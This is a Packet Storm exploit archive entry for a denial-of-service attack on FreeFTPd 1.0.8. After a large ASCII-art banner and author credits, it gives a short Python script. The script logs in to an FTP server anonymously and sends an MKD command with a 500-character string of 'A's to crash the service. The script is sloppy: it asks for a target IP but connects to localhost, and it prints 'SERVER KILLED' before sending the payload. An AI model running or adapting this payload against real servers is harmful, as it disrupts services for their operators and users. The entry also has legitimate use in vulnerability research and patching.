FreeFTPd 1.0.8 mkd Denial Of Service

2016-10-31T00:00:00
ID PACKETSTORM:139434
Type packetstorm
Reporter Greg Priest
Modified 2016-10-31T00:00:00

Description

                                        
                                            `from ftplib import FTP  
  
print '''  
  
  
`,;'++';,`   
`'++++++++++++++++;`   
.+++++++++++++++++++++++'`   
;++++++:` `:++++++:   
'++++'` , +`. :; .`` .'++++;   
:++++, '+ `+.+.+`+':+:+ +:` + :++++,   
++++, `+ +`+.+`+':+.+ +:'.+. :++++   
,+++; +` +:':+`+',+`+,++.+:+ +, '+++.   
'+++` `++ ;+ ,+:'; ,: ;;+`++ +.+`+. `+++;   
+++; `: ++' + '+++ :++;++,+: + '+++   
+++, ++' ,+ .;+++++',` : + ',+ :+++   
+++` ++ +:+ +: .+++++++++++++++; : ++'+,,`,+++   
+++` `+;.+'` '++++++++++++++++++++. ;+;+:.+` .+++   
'++` ++ +,.` '++++++++++++++++++++++++. +;.+`+ ,++;   
:++, +:++`' ,+++++++++++++''++++++++++++ `+.+: :++.   
++; . +:+: +++++++++'. `;++++++++. .+' ++ +++   
+++ ;++ +: ++++++++, .+++++++; ;:+;+ +++   
:++ ;+,++ `+++++++, `++++++' +,+,.+ `++.   
++: `+`+'. ++++++' ;+++++' +`;++ '++   
'++ ,+,' ++++++, .+++++; ++ ++:   
++. ' + ++++++` +++++. ` '+.:++   
;++ +; + ;+++++` +++++ :++ ; ++:   
++, '++ `+++++, `+++++ +` `. :++   
,++ ` ;+: +++++' :++++` ,+ ++`   
++; .+++` .+++++ +++++ '++:: ++'   
++` ;+':: +++++. ++++` '`+++`.++   
.++ `++ +++++ '++++ +: ++`   
'++ `++; '++++` ++++ ++;   
++, +.,;: ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++:   
++` `+++``+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   
++ +;,` ;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   
`++ ,'+++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   
,++ `++'+ ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::;+++++:  
;++ `.,. +++++  
+++ '..': ,++'` ,+++` `++++  
+++ +;+` ++++: ++++++' ++++++' ++++  
+++ :.'`; ++++: ++` :+, ++` ,+: ++++  
'++ `+++. ++++; : + : + ,++++  
;++ :` ++++' `+++++  
,++ `+;;+ +++++ ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; :;;;;;;;;;;;;;;++++++.  
`++ ++,+ +++++ :+++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++'   
++ ` `, ;++++ ++++++++++++++++++++++++++++++++++++: ++++++++++++++++++++   
++` .+++.`++++: ++++++++++++++++++++++++++++++++++++ `++++++++++++++++++,   
++: ','+: +++++ :+++++,,,,,,,,,,,,,,,,,,,,,,,,;+++++ ++++:,:,,:,,+++,.   
;++ +:`, '++++` +++++. +++++` ++++ '.+' ++,   
++ +++ +++++ :+++++ ++++++ ;++++ ++.+ ++   
++, ';`+' +++++` ++++++ ++++++ ++++` + +. :++   
'++ :++;, .+++++ ++++++` ++++++, +++++ ++:   
`++ +` :+, +++++: .++++++' :++++++; .++++. +` `++   
++' ;++` `+++++` ,+++++++'` :+++++++; +++++ :++` +++   
,++ ,: + '+++++ .++++++++++';:;++++++++++: +++++ ;+' ++`   
+++ :+' ++++++ ++++++++++++++++++++++` +++++. ;+` , +++   
,++ :++`;+` ++++++` :++++++++++++++++++' +++++' `+,+;`;`++.   
+++ : ++.+ `++++++: :++++++++++++++; ,+++++' ++`+ +++   
`++, +;+` `+++++++` `:++++++++:` ++++++' ++ ,+; ;++`   
'++ :+ `' ++++++++` `+++++++; +++ ;`++;   
+++ `:`+ +++++++++: ,++++++++, +,++ +++   
+++ +++;' :+++++++++++';::;'+++++++++++ ;+ +,' +++   
,+++ +++.+.: +++++++++++++++++++++++++. '' ++ + +++`   
;++' ` +`+`;. `+++++++++++++++++++++, :,+,:+: +++,   
;+++ ,++:'++` ,+++++++++++++++; ++ .++ ` +++:   
;+++ + +`+ +; .;'++++':` ++.+':++ +++:   
:+++` `++, :;+`+; ::+ +,+`+. .+++,   
.+++' `, +`:'+ +,+` +, +:+.++:';+ ++ ++++`   
++++. +':++: +;+` ': +:+ +.+ +' :++++   
:++++. . +,+,;+'` '; :'+`+'+ ,++++,   
+++++: ` +`+'` '; `++` ;++++'   
`++++++: ;' + :++++++`   
`+++++++':. `,:+++++++'   
.++++++++++++++++++++++.   
`:'++++++++++++',   
  
##############################################  
# Created: ScrR1pTK1dd13 #  
# Name: Greg Priest #  
# Mail: ScrR1pTK1dd13.slammer@gmail.com #   
##############################################  
  
  
# Exploit Title: FreeFTPD_1.0.8_mkd_command_DoS_Exploit  
# Date: 2016.10.30  
# Exploit Author: Greg Priest  
# Version: FreeFTPD_1.0.8  
# Tested on: Windows XP, Windows 7 x64  
  
'''  
  
ftp_ip = raw_input("FTP server IP:")  
killerstring = 'A' * 500  
ftp = FTP('127.0.0.1')  
ftp.login('anonymous', 'h4ck3r@h4ck3r.net')  
print ftp.login  
print "SERVER KILLED"  
FTP.mkd(ftp, killerstring)  
  
`